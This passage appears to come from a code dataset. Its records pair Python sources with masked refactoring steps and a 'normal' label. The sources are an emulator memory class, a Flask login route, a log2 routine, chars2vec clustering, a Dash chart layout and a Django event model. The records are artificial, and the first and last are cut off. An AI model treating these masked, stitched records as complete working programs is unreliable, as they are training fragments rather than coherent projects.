view[0xFE00:0xFEA0]\n self.IO = view[0xFF00:0xFF80]\n self._HiRAM = view[0xFF80:0xFFFF]\n\n self.view = view\n self.mbc = mbc\n self.mbc.bank0 = self._rom0\n self.mbc.bank1 = self._rom1\n\n self.view[0xFE00:0xFFFF] = bytearray([0x00 for _ in range(0x1FF)]) # IO, etc defaults to blank\n self.mem[0xFFFF] = 0xFF # IE\n\n self.link_buffer = 0\n\n self.serial_buff = \"\"\n self._io_handlers:Dict[int, Register] = {}\n self.add_io_handler(0xFF46, HandlerProxy(self.dma))\n # Add bootrom disable handler\n self.add_io_handler(0xFF50, HandlerProxy(self.mbc.disable_bootrom))\n\n def dma(self, val:int) -> None:\n dest = 0xFE00\n offset = val * 0x100\n for n in range(0xA0):\n self.mem[dest + n] = self.mem[n + offset]\n\n def __getitem__(self, val:int) -> int:\n if val < 0xE000:\n return self.view[val]\n elif val < 0xFE00:\n # Echo RAM, subtract 0x2000\n return self.view[val-0x2000]\n elif val < 0xFE80:\n return self.OAM[val-0xFE00]\n elif val < 0xFF00:\n return 0xFF\n elif val < 0xFF80:\n if val in self._io_handlers:\n return self._io_handlers[val].value\n elif val == 0xFF00:\n return self._ui.input\n else:\n return self.IO[val-0xFF00]\n elif val < 0xFFFF:\n return self._HiRAM[val-0xFF80]\n elif val == 0xFFFF:\n return self.mem[0xFFFF]\n raise ValueError(\"Access out of bounds\")\n\n def __setitem__(self, key:int, val:int) -> None:\n if key < 0x8000:\n self.mbc[key] = val\n elif key < 0xA000:\n\t self._vram[key-0x8000] = val\n elif key < 0xC000:\n if self.mbc.ram_enabled:\n # TODO: Read $0x149 and determine RAM Size\n # TODO: Pass to MBC\n self._eram[key-0xA000] = val\n elif key < 0xE000:\n\t self._wram[key-0xC000] = val\n elif key < 0xFE00:\n\t self._wram[key-0xE000] = val\n elif key < 0xFEA0:\n\t self.OAM[key-0xFE00] = val\n elif key < 0xFF00:\n pass\n elif key < 0xFF80:\n if key in self._io_handlers:\n self._io_handlers[key].value = val\n if key == 0xFF00:\n self._ui.input = val\n elif key == 0xFF01:\n self.link_buffer = val\n elif key == 0xFF02:\n if val == 0x81:\n self.serial_buff += chr(self.link_buffer)\n if self.link_buffer == ord(\"\\n\"):\n print(self.serial_buff, end='', file=sys.stderr)\n # Test ROM Routines\n if self.serial_buff == \"Passed\\n\":\n #sys.exit(0)\n pass\n elif self.serial_buff == \"Failed\\n\":\n #sys.exit(1)\n pass\n self.serial_buff = \"\"\n else:\n self.IO[key-0xFF00] = val\n elif key < 0xFFFF:\n\t self._HiRAM[key-0xFF80] = val\n else:\n self.mem[65535] = val\n\n def add_io_handler(self, val:int, handler:Register) -> None:\n self._io_handlers[val] = handler\n", "step-ids": [ 4, 6, 7, 8, 9 ] }
[ 4, 6, 7, 8, 9 ]
from meross_iot.model.http.exception import HttpApiError from logger import get_logger from typing import Dict from flask import Blueprint from authentication import _user_login from decorator import meross_http_api from messaging import make_api_response auth_blueprint = Blueprint('auth', __name__) _LOGGER = get_logger(__name__) @auth_blueprint.route('/Login', methods=['POST']) @meross_http_api(login_required=False) def login(api_payload: Dict, *args, **kwargs): email = api_payload.get("email") password = api_payload.get("password") if email is None: raise HttpApiError("Missing email parameter") if password is None: raise HttpApiError("Missing password parameter") user, token = _user_login(email, password) _LOGGER.info("User: %s successfully logged in" % email) data = { "token": str(token.token), "key": str(user.mqtt_key), "userid": str(user.user_id), "email": str(user.email) } return make_api_response(data=data)
normal
{ "blob_id": "afccd33e4c6bc5b7907a6af4ab698489fc9ea70d", "index": 5299, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@auth_blueprint.route('/Login', methods=['POST'])\n@meross_http_api(login_required=False)\ndef login(api_payload: Dict, *args, **kwargs):\n email = api_payload.get('email')\n password = api_payload.get('password')\n if email is None:\n raise HttpApiError('Missing email parameter')\n if password is None:\n raise HttpApiError('Missing password parameter')\n user, token = _user_login(email, password)\n _LOGGER.info('User: %s successfully logged in' % email)\n data = {'token': str(token.token), 'key': str(user.mqtt_key), 'userid':\n str(user.user_id), 'email': str(user.email)}\n return make_api_response(data=data)\n", "step-3": "<mask token>\nauth_blueprint = Blueprint('auth', __name__)\n_LOGGER = get_logger(__name__)\n\n\n@auth_blueprint.route('/Login', methods=['POST'])\n@meross_http_api(login_required=False)\ndef login(api_payload: Dict, *args, **kwargs):\n email = api_payload.get('email')\n password = api_payload.get('password')\n if email is None:\n raise HttpApiError('Missing email parameter')\n if password is None:\n raise HttpApiError('Missing password parameter')\n user, token = _user_login(email, password)\n _LOGGER.info('User: %s successfully logged in' % email)\n data = {'token': str(token.token), 'key': str(user.mqtt_key), 'userid':\n str(user.user_id), 'email': str(user.email)}\n return make_api_response(data=data)\n", "step-4": "from meross_iot.model.http.exception import HttpApiError\nfrom logger import get_logger\nfrom typing import Dict\nfrom flask import Blueprint\nfrom authentication import _user_login\nfrom decorator import meross_http_api\nfrom messaging import make_api_response\nauth_blueprint = Blueprint('auth', __name__)\n_LOGGER = get_logger(__name__)\n\n\n@auth_blueprint.route('/Login', methods=['POST'])\n@meross_http_api(login_required=False)\ndef login(api_payload: Dict, *args, **kwargs):\n email = api_payload.get('email')\n password = api_payload.get('password')\n if email is None:\n raise HttpApiError('Missing email parameter')\n if password is None:\n raise HttpApiError('Missing password parameter')\n user, token = _user_login(email, password)\n _LOGGER.info('User: %s successfully logged in' % email)\n data = {'token': str(token.token), 'key': str(user.mqtt_key), 'userid':\n str(user.user_id), 'email': str(user.email)}\n return make_api_response(data=data)\n", "step-5": "from meross_iot.model.http.exception import HttpApiError\n\nfrom logger import get_logger\nfrom typing import Dict\n\nfrom flask import Blueprint\n\nfrom authentication import _user_login\nfrom decorator import meross_http_api\nfrom messaging import make_api_response\n\n\nauth_blueprint = Blueprint('auth', __name__)\n_LOGGER = get_logger(__name__)\n\n\n@auth_blueprint.route('/Login', methods=['POST'])\n@meross_http_api(login_required=False)\ndef login(api_payload: Dict, *args, **kwargs):\n email = api_payload.get(\"email\")\n password = api_payload.get(\"password\")\n\n if email is None:\n raise HttpApiError(\"Missing email parameter\")\n if password is None:\n raise HttpApiError(\"Missing password parameter\")\n\n user, token = _user_login(email, password)\n _LOGGER.info(\"User: %s successfully logged in\" % email)\n data = {\n \"token\": str(token.token),\n \"key\": str(user.mqtt_key),\n \"userid\": str(user.user_id),\n \"email\": str(user.email)\n }\n return make_api_response(data=data)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# encoding=utf-8 ''' Finding log2() using sqrt() 原理: sqrt( 2**l * 2**h ) = 2**( (l+h)/2 ) 而 a+b /2 正好是binary search, 与sqrt对应上了 题目应当是要求 意思就是找到2**x == y ''' class Solution: def log2(self, val): if 0<val<1: return -self.log2(1.0/val) if val==1: return 0 h = 1; accuracy = 0.001; cur =2 #val>1 才是普通情况 while cur < val: h+=1 cur+=cur l = h-1 #如果是求整数, 已经求得结果了。 lval = cur/2; hval = cur while l<h: m = (l+h)/2.0 midVal = (lval * hval)**0.5 if abs(midVal- val)<accuracy: return m elif midVal> val: h = m; hval = midVal else: l = m; lval = midVal s = Solution() print s.log2(13)
normal
{ "blob_id": "6ea41b0a76ddde04bcaffacea604f218eac9ac71", "index": 1783, "step-1": "# encoding=utf-8\n'''\nFinding log2() using sqrt()\n\n\n原理: sqrt( 2**l * 2**h ) = 2**( (l+h)/2 )\n而 a+b /2 正好是binary search, 与sqrt对应上了\n\n题目应当是要求\n\n意思就是找到2**x == y\n'''\n\nclass Solution:\n def log2(self, val):\n if 0<val<1: return -self.log2(1.0/val)\n if val==1: return 0\n h = 1; accuracy = 0.001; cur =2 #val>1 才是普通情况\n while cur < val:\n h+=1\n cur+=cur\n l = h-1 #如果是求整数, 已经求得结果了。\n lval = cur/2; hval = cur\n while l<h:\n m = (l+h)/2.0\n midVal = (lval * hval)**0.5\n if abs(midVal- val)<accuracy: return m\n elif midVal> val:\n h = m; hval = midVal\n else:\n l = m; lval = midVal\ns = Solution()\nprint s.log2(13)\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import chars2vec import sklearn.decomposition import matplotlib.pyplot as plt import csv # Load Inutition Engineering pretrained model # Models names: 'eng_50', 'eng_100', 'eng_150' 'eng_200', 'eng_300' from sklearn.cluster import KMeans c2v_model = chars2vec.load_model('eng_50') words=[] etichette=[] with open('datasetParsing2DEF.csv') as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 for row in csv_reader: if line_count == 0: print(f'Column names are {", ".join(row)}') line_count += 1 else: print(row[1],row[2]) words.append(row[2]) etichette.append(row[1]) line_count += 1 print(f'Processed {line_count} lines.') # Create word embeddings word_embeddings = c2v_model.vectorize_words(words) print(word_embeddings) kmeans = KMeans( init="random", n_clusters=4, n_init=10, max_iter=200, random_state=30) kmeans.fit(word_embeddings), y_kmeans = kmeans.predict(word_embeddings) print(y_kmeans) i=0; for j in range(0,len(y_kmeans)): print(etichette[i]) print(word_embeddings[j,0]) print(word_embeddings[j,1]) print() #plt.scatter(word_embeddings[:, 0], word_embeddings[:, 1],marker=('$' + etichette[i] + '$'),c=y_kmeans, s=1800) plt.scatter(word_embeddings[j, 0], word_embeddings[j, 1], marker=('$' + 'O'+ '$'), s=30, label=j) i=i+1 centers = kmeans.cluster_centers_ plt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5) plt.show()
normal
{ "blob_id": "084579152a2cc7feb2c31e0209ce1e32f4905d81", "index": 5316, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith open('datasetParsing2DEF.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n print(f\"Column names are {', '.join(row)}\")\n line_count += 1\n else:\n print(row[1], row[2])\n words.append(row[2])\n etichette.append(row[1])\n line_count += 1\n print(f'Processed {line_count} lines.')\n<mask token>\nprint(word_embeddings)\n<mask token>\nkmeans.fit(word_embeddings),\n<mask token>\nprint(y_kmeans)\n<mask token>\nfor j in range(0, len(y_kmeans)):\n print(etichette[i])\n print(word_embeddings[j, 0])\n print(word_embeddings[j, 1])\n print()\n plt.scatter(word_embeddings[j, 0], word_embeddings[j, 1], marker='$' +\n 'O' + '$', s=30, label=j)\n i = i + 1\n<mask token>\nplt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)\nplt.show()\n", "step-3": "<mask token>\nc2v_model = chars2vec.load_model('eng_50')\nwords = []\netichette = []\nwith open('datasetParsing2DEF.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n print(f\"Column names are {', '.join(row)}\")\n line_count += 1\n else:\n print(row[1], row[2])\n words.append(row[2])\n etichette.append(row[1])\n line_count += 1\n print(f'Processed {line_count} lines.')\nword_embeddings = c2v_model.vectorize_words(words)\nprint(word_embeddings)\nkmeans = KMeans(init='random', n_clusters=4, n_init=10, max_iter=200,\n random_state=30)\nkmeans.fit(word_embeddings),\ny_kmeans = kmeans.predict(word_embeddings)\nprint(y_kmeans)\ni = 0\nfor j in range(0, len(y_kmeans)):\n print(etichette[i])\n print(word_embeddings[j, 0])\n print(word_embeddings[j, 1])\n print()\n plt.scatter(word_embeddings[j, 0], word_embeddings[j, 1], marker='$' +\n 'O' + '$', s=30, label=j)\n i = i + 1\ncenters = kmeans.cluster_centers_\nplt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)\nplt.show()\n", "step-4": "import chars2vec\nimport sklearn.decomposition\nimport matplotlib.pyplot as plt\nimport csv\nfrom sklearn.cluster import KMeans\nc2v_model = chars2vec.load_model('eng_50')\nwords = []\netichette = []\nwith open('datasetParsing2DEF.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n print(f\"Column names are {', '.join(row)}\")\n line_count += 1\n else:\n print(row[1], row[2])\n words.append(row[2])\n etichette.append(row[1])\n line_count += 1\n print(f'Processed {line_count} lines.')\nword_embeddings = c2v_model.vectorize_words(words)\nprint(word_embeddings)\nkmeans = KMeans(init='random', n_clusters=4, n_init=10, max_iter=200,\n random_state=30)\nkmeans.fit(word_embeddings),\ny_kmeans = kmeans.predict(word_embeddings)\nprint(y_kmeans)\ni = 0\nfor j in range(0, len(y_kmeans)):\n print(etichette[i])\n print(word_embeddings[j, 0])\n print(word_embeddings[j, 1])\n print()\n plt.scatter(word_embeddings[j, 0], word_embeddings[j, 1], marker='$' +\n 'O' + '$', s=30, label=j)\n i = i + 1\ncenters = kmeans.cluster_centers_\nplt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)\nplt.show()\n", "step-5": "import chars2vec\nimport sklearn.decomposition\nimport matplotlib.pyplot as plt\nimport csv\n\n# Load Inutition Engineering pretrained model\n# Models names: 'eng_50', 'eng_100', 'eng_150' 'eng_200', 'eng_300'\nfrom sklearn.cluster import KMeans\n\nc2v_model = chars2vec.load_model('eng_50')\n\nwords=[]\netichette=[]\n\nwith open('datasetParsing2DEF.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(row[1],row[2])\n words.append(row[2])\n etichette.append(row[1])\n line_count += 1\n\n\n print(f'Processed {line_count} lines.')\n\n\n\n# Create word embeddings\nword_embeddings = c2v_model.vectorize_words(words)\nprint(word_embeddings)\n\n\nkmeans = KMeans(\n init=\"random\",\n n_clusters=4,\n n_init=10,\n max_iter=200,\n random_state=30)\n\nkmeans.fit(word_embeddings),\n\ny_kmeans = kmeans.predict(word_embeddings)\nprint(y_kmeans)\ni=0;\nfor j in range(0,len(y_kmeans)):\n print(etichette[i])\n print(word_embeddings[j,0])\n print(word_embeddings[j,1])\n print()\n #plt.scatter(word_embeddings[:, 0], word_embeddings[:, 1],marker=('$' + etichette[i] + '$'),c=y_kmeans, s=1800)\n plt.scatter(word_embeddings[j, 0], word_embeddings[j, 1],\n marker=('$' + 'O'+ '$'),\n s=30, label=j)\n i=i+1\n\ncenters = kmeans.cluster_centers_\n\nplt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)\n\nplt.show()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import dash_html_components as html import dash_core_components as dcc layout = html.Div([ html.Div([ html.Div([ html.H6('Répartition des biens'), dcc.Graph( id = "pieGraph", figure = { "data": [{ "values": [2878001,2342181,1773296,521395], "labels": [ 'Maison', 'Appartement', 'Dependance','local_indistriel' ], "name": "Biens", "hoverinfo":"label+name+percent", "hole": .7, "type": "pie", "marker": {'colors':['#3b7548','#ea1313','#ffd700','#FF00FF']} }], "layout": { "width": "2000", "annotations": [{ "font": { "size": 20 }, "showarrow": False, "text": "", "x": 0.2, "y": 0.2 }], "showlegend": False } } ) ], className="six columns"), html.Div([ html.H6('Effectif des biens'), dcc.Graph( id = "3", figure ={ "data": [{ 'x':[ 'Maison', 'Appartement', 'Dependance','local_indistriel' ], 'y':[2878001,2342181,1773296,521395], 'name':'Bar biens', 'type':'bar', 'marker' :dict(color=['#3b7548','#ea1313','#ffd700','#FF00FF']), }], "layout": { "xaxis" : dict(tickfont=dict(color='black')), "yaxis" : dict(tickfont=dict(color='black')), "width": "2000", 'yaxis':{ 'title':'Nombre' }, 'xaxis':{ 'title':'Type' }, "annotations": [{ "font": {"size": 20}, "showarrow": False, "text": "", "x": 0.2, "y": 0.2 }], "showlegend": False } } ) ], className="six columns"), ], className="row", style={"margin": "1% 3%"}) ])
normal
{ "blob_id": "83c3193ea40c9328d16fb91774762a76352d8e09", "index": 8417, "step-1": "<mask token>\n", "step-2": "<mask token>\nlayout = html.Div([html.Div([html.Div([html.H6('Répartition des biens'),\n dcc.Graph(id='pieGraph', figure={'data': [{'values': [2878001, 2342181,\n 1773296, 521395], 'labels': ['Maison', 'Appartement', 'Dependance',\n 'local_indistriel'], 'name': 'Biens', 'hoverinfo': 'label+name+percent',\n 'hole': 0.7, 'type': 'pie', 'marker': {'colors': ['#3b7548', '#ea1313',\n '#ffd700', '#FF00FF']}}], 'layout': {'width': '2000', 'annotations': [{\n 'font': {'size': 20}, 'showarrow': False, 'text': '', 'x': 0.2, 'y': \n 0.2}], 'showlegend': False}})], className='six columns'), html.Div([\n html.H6('Effectif des biens'), dcc.Graph(id='3', figure={'data': [{'x':\n ['Maison', 'Appartement', 'Dependance', 'local_indistriel'], 'y': [\n 2878001, 2342181, 1773296, 521395], 'name': 'Bar biens', 'type': 'bar',\n 'marker': dict(color=['#3b7548', '#ea1313', '#ffd700', '#FF00FF'])}],\n 'layout': {'xaxis': dict(tickfont=dict(color='black')), 'yaxis': dict(\n tickfont=dict(color='black')), 'width': '2000', 'yaxis': {'title':\n 'Nombre'}, 'xaxis': {'title': 'Type'}, 'annotations': [{'font': {'size':\n 20}, 'showarrow': False, 'text': '', 'x': 0.2, 'y': 0.2}], 'showlegend':\n False}})], className='six columns')], className='row', style={'margin':\n '1% 3%'})])\n", "step-3": "import dash_html_components as html\nimport dash_core_components as dcc\nlayout = html.Div([html.Div([html.Div([html.H6('Répartition des biens'),\n dcc.Graph(id='pieGraph', figure={'data': [{'values': [2878001, 2342181,\n 1773296, 521395], 'labels': ['Maison', 'Appartement', 'Dependance',\n 'local_indistriel'], 'name': 'Biens', 'hoverinfo': 'label+name+percent',\n 'hole': 0.7, 'type': 'pie', 'marker': {'colors': ['#3b7548', '#ea1313',\n '#ffd700', '#FF00FF']}}], 'layout': {'width': '2000', 'annotations': [{\n 'font': {'size': 20}, 'showarrow': False, 'text': '', 'x': 0.2, 'y': \n 0.2}], 'showlegend': False}})], className='six columns'), html.Div([\n html.H6('Effectif des biens'), dcc.Graph(id='3', figure={'data': [{'x':\n ['Maison', 'Appartement', 'Dependance', 'local_indistriel'], 'y': [\n 2878001, 2342181, 1773296, 521395], 'name': 'Bar biens', 'type': 'bar',\n 'marker': dict(color=['#3b7548', '#ea1313', '#ffd700', '#FF00FF'])}],\n 'layout': {'xaxis': dict(tickfont=dict(color='black')), 'yaxis': dict(\n tickfont=dict(color='black')), 'width': '2000', 'yaxis': {'title':\n 'Nombre'}, 'xaxis': {'title': 'Type'}, 'annotations': [{'font': {'size':\n 20}, 'showarrow': False, 'text': '', 'x': 0.2, 'y': 0.2}], 'showlegend':\n False}})], className='six columns')], className='row', style={'margin':\n '1% 3%'})])\n", "step-4": "import dash_html_components as html\nimport dash_core_components as dcc\n\n\n\nlayout = html.Div([\n html.Div([\n html.Div([\n html.H6('Répartition des biens'),\n dcc.Graph(\n id = \"pieGraph\",\n figure = {\n \"data\": [{\n \"values\": [2878001,2342181,1773296,521395],\n \"labels\": [ 'Maison', 'Appartement', 'Dependance','local_indistriel' ],\n \"name\": \"Biens\",\n \"hoverinfo\":\"label+name+percent\",\n \"hole\": .7,\n \"type\": \"pie\",\n \"marker\": {'colors':['#3b7548','#ea1313','#ffd700','#FF00FF']}\n }],\n \"layout\": {\n \"width\": \"2000\",\n \"annotations\": [{\n \"font\": {\n \"size\": 20\n },\n \"showarrow\": False,\n \"text\": \"\",\n \"x\": 0.2,\n \"y\": 0.2\n }],\n \"showlegend\": False \n }\n }\n )\n ], className=\"six columns\"),\n\n html.Div([\n html.H6('Effectif des biens'),\n\n dcc.Graph(\n id = \"3\",\n figure ={\n \"data\": [{\n 'x':[ 'Maison', 'Appartement', 'Dependance','local_indistriel' ],\n 'y':[2878001,2342181,1773296,521395],\n 'name':'Bar biens',\n 'type':'bar',\n 'marker' :dict(color=['#3b7548','#ea1313','#ffd700','#FF00FF']),\n }],\n \"layout\": {\n \"xaxis\" : dict(tickfont=dict(color='black')),\n \"yaxis\" : dict(tickfont=dict(color='black')),\n \"width\": \"2000\",\n 'yaxis':{\n 'title':'Nombre'\n },\n 'xaxis':{\n 'title':'Type'\n },\n \"annotations\": [{\n \"font\": {\"size\": 20},\n \"showarrow\": False,\n \"text\": \"\",\n \"x\": 0.2,\n \"y\": 0.2\n }],\n \"showlegend\": False \n }\n }\n )\n\n ], className=\"six columns\"),\n\n ], className=\"row\", style={\"margin\": \"1% 3%\"})\n])", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# coding: utf-8 from datetime import datetime #from __future__ import unicode_literals from django.db import models from django.utils.encoding import python_2_unicode_compatible from django.utils import timezone from persol_users.models import PersolUser from django.db.models import Q, Count # アンケート from questions.models import Question @python_2_unicode_compatible class Person(models.Model): name = models.CharField(max_length=50) pass def __str__(self): return self.name class Event(models.Model): STATUS_CHOICES = ( ("N","募集中"), ("E","募集終了") ) author = models.ForeignKey(PersolUser, verbose_name='作成者', related_name='author') event_name = models.CharField('イベントタイトル', max_length=200) event_image = models.ImageField('イメージ画像', upload_to='event_image', blank=True, null=True) event_datetime = models.DateTimeField('開催日時', null=True) event_location = models.CharField('開催場所', max_length=200, blank=True) num_of_members = models.IntegerField('募集人数') dead_line = models.DateField('募集締切日', blank=True,null=True) overview = models.TextField('イベント概要') # comment = models.ManyToManyField(Comment) like = models.ManyToManyField(PersolUser,verbose_name='いいね', related_name='like') watch = models.ManyToManyField(PersolUser,verbose_name='ウォッチ', related_name='Watch') members = models.ManyToManyField(PersolUser) search_tag = models.TextField('検索用タグ', blank=True, null=True) event_status = models.CharField('イベントステータス', max_length=1, choices=STATUS_CHOICES, blank=False, null=False, default='N') # アンケート question_date = models.OneToOneField(Question, related_name='event_date', blank=True, null=True) question_location = models.OneToOneField(Question, related_name='event_location', blank=True, null=True) def __str__(self): return self.event_name def nokori(self): now_member = self.members.count() return self.num_of_members - now_member def like_list(self): return self.like.all() def event_date(self): try: return self.event_datetime.strftime('%Y.%m.%d') except AttributeError: return "" def event_starttime(self): try: return self.event_datetime.strftime('%H:%M~') except AttributeError: return "" def nobreak_overview(self): return self.overview.replace("\n", "") # アンケート削除 def question_delete(self, type): if type == 'd': q = self.question_date self.question_date = None elif type == 'l': q = self.question_location self.question_location = None if q: q.delete() # アンケート取得。なければデフォルト値のダミーアンケートを返す def question_date_or_dummy(self): qd = self.question_date if not qd: qd = Question.get_default_question('d') return qd def question_location_or_dummy(self): ql = self.question_location if not ql: ql = Question.get_default_question('l') return ql def mailing_list(self): member_addr=[member.mail_address for member in self.members.all()] watcher_addr=[watcher.mail_address for watcher in self.watch.all()] ml=member_addr+watcher_addr return ml def status(self): if self.event_status == "N": return "募集中" if self.event_status == "E": return "イベント終了" else:return "" def datetimeForIndex(self): if self.event_datetime: return self.event_datetime if not self.question_date: return "未定" else: return "アンケート中" def locationForIndex(self): if self.event_location: return self.event_location if not self.question_location: return "未定" else: return "アンケート中" def oldstatus(self): if self.event_datetime < datetime.now(): return 'old' else: return '' """ python manage.py makemigrations python manage.py migrate """
normal
{ "blob_id": "ca0bca24509df2bf0bd07fb2f31d3e7909957405", "index": 3483, "step-1": "<mask token>\n\n\nclass Event(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.event_name\n <mask token>\n\n def like_list(self):\n return self.like.all()\n\n def event_date(self):\n try:\n return self.event_datetime.strftime('%Y.%m.%d')\n except AttributeError:\n return ''\n <mask token>\n\n def nobreak_overview(self):\n return self.overview.replace('\\n', '')\n <mask token>\n\n def question_date_or_dummy(self):\n qd = self.question_date\n if not qd:\n qd = Question.get_default_question('d')\n return qd\n\n def question_location_or_dummy(self):\n ql = self.question_location\n if not ql:\n ql = Question.get_default_question('l')\n return ql\n\n def mailing_list(self):\n member_addr = [member.mail_address for member in self.members.all()]\n watcher_addr = [watcher.mail_address for watcher in self.watch.all()]\n ml = member_addr + watcher_addr\n return ml\n\n def status(self):\n if self.event_status == 'N':\n return '募集中'\n if self.event_status == 'E':\n return 'イベント終了'\n else:\n return ''\n\n def datetimeForIndex(self):\n if self.event_datetime:\n return self.event_datetime\n if not self.question_date:\n return '未定'\n else:\n return 'アンケート中'\n\n def locationForIndex(self):\n if self.event_location:\n return self.event_location\n if not self.question_location:\n return '未定'\n else:\n return 'アンケート中'\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Event(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.event_name\n\n def nokori(self):\n now_member = self.members.count()\n return self.num_of_members - now_member\n\n def like_list(self):\n return self.like.all()\n\n def event_date(self):\n try:\n return self.event_datetime.strftime('%Y.%m.%d')\n except AttributeError:\n return ''\n <mask token>\n\n def nobreak_overview(self):\n return self.overview.replace('\\n', '')\n <mask token>\n\n def question_date_or_dummy(self):\n qd = self.question_date\n if not qd:\n qd = Question.get_default_question('d')\n return qd\n\n def question_location_or_dummy(self):\n ql = self.question_location\n if not ql:\n ql = Question.get_default_question('l')\n return ql\n\n def mailing_list(self):\n member_addr = [member.mail_address for member in self.members.all()]\n watcher_addr = [watcher.mail_address for watcher in self.watch.all()]\n ml = member_addr + watcher_addr\n return ml\n\n def status(self):\n if self.event_status == 'N':\n return '募集中'\n if self.event_status == 'E':\n return 'イベント終了'\n else:\n return ''\n\n def datetimeForIndex(self):\n if self.event_datetime:\n return self.event_datetime\n if not self.question_date:\n return '未定'\n else:\n return 'アンケート中'\n\n def locationForIndex(self):\n if self.event_location:\n return self.event_location\n if not self.question_location:\n return '未定'\n else:\n return 'アンケート中'\n\n def oldstatus(self):\n if self.event_datetime < datetime.now():\n return 'old'\n else:\n return ''\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Event(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.event_name\n\n def nokori(self):\n now_member = self.members.count()\n return self.num_of_members - now_member\n\n def like_list(self):\n return self.like.all()\n\n def event_date(self):\n try:\n return self.event_datetime.strftime('%Y.%m.%d')\n except AttributeError:\n return ''\n\n def event_starttime(self):\n try:\n return self.event_datetime.strftime('%H:%M~')\n except AttributeError:\n return ''\n\n def nobreak_overview(self):\n return self.overview.replace('\\n', '')\n\n def question_delete(self, type):\n if type == 'd':\n q = self.question_date\n self.question_date = None\n elif type == 'l':\n q = self.question_location\n self.question_location = None\n if q:\n q.delete()\n\n def question_date_or_dummy(self):\n qd = self.question_date\n if not qd:\n qd = Question.get_default_question('d')\n return qd\n\n def question_location_or_dummy(self):\n ql = self.question_location\n if not ql:\n ql = Question.get_default_question('l')\n return ql\n\n def mailing_list(self):\n member_addr = [member.mail_address for member in self.members.all()]\n watcher_addr = [watcher.mail_address for watcher in self.watch.all()]\n ml = member_addr + watcher_addr\n return ml\n\n def status(self):\n if self.event_status == 'N':\n return '募集中'\n if self.event_status == 'E':\n return 'イベント終了'\n else:\n return ''\n\n def datetimeForIndex(self):\n if self.event_datetime:\n return self.event_datetime\n if not self.question_date:\n return '未定'\n else:\n return 'アンケート中'\n\n def locationForIndex(self):\n if self.event_location:\n return self.event_location\n if not self.question_location:\n return '未定'\n else:\n return 'アンケート中'\n\n def oldstatus(self):\n if self.event_datetime < datetime.now():\n return 'old'\n else:\n return ''\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass Event(models.Model):\n STATUS_CHOICES = ('N', '募集中'), ('E', '募集終了')\n author = models.ForeignKey(PersolUser, verbose_name='作成者', related_name\n ='author')\n event_name = models.CharField('イベントタイトル', max_length=200)\n event_image = models.ImageField('イメージ画像', upload_to='event_image',\n blank=True, null=True)\n event_datetime = models.DateTimeField('開催日時', null=True)\n event_location = models.CharField('開催場所', max_length=200, blank=True)\n num_of_members = models.IntegerField('募集人数')\n dead_line = models.DateField('募集締切日', blank=True, null=True)\n overview = models.TextField('イベント概要')\n like = models.ManyToManyField(PersolUser, verbose_name='いいね',\n related_name='like')\n watch = models.ManyToManyField(PersolUser, verbose_name='ウォッチ',\n related_name='Watch')\n members = models.ManyToManyField(PersolUser)\n search_tag = models.TextField('検索用タグ', blank=True, null=True)\n event_status = models.CharField('イベントステータス', max_length=1, choices=\n STATUS_CHOICES, blank=False, null=False, default='N')\n question_date = models.OneToOneField(Question, related_name=\n 'event_date', blank=True, null=True)\n question_location = models.OneToOneField(Question, related_name=\n 'event_location', blank=True, null=True)\n\n def __str__(self):\n return self.event_name\n\n def nokori(self):\n now_member = self.members.count()\n return self.num_of_members - now_member\n\n def like_list(self):\n return self.like.all()\n\n def event_date(self):\n try:\n return self.event_datetime.strftime('%Y.%m.%d')\n except AttributeError:\n return ''\n\n def event_starttime(self):\n try:\n return self.event_datetime.strftime('%H:%M~')\n except AttributeError:\n return ''\n\n def nobreak_overview(self):\n return self.overview.replace('\\n', '')\n\n def question_delete(self, type):\n if type == 'd':\n q = self.question_date\n self.question_date = None\n elif type == 'l':\n q = self.question_location\n self.question_location = None\n if q:\n q.delete()\n\n def question_date_or_dummy(self):\n qd = self.question_date\n if not qd:\n qd = Question.get_default_question('d')\n return qd\n\n def question_location_or_dummy(self):\n ql = self.question_location\n if not ql:\n ql = Question.get_default_question('l')\n return ql\n\n def mailing_list(self):\n member_addr = [member.mail_address for member in self.members.all()]\n watcher_addr = 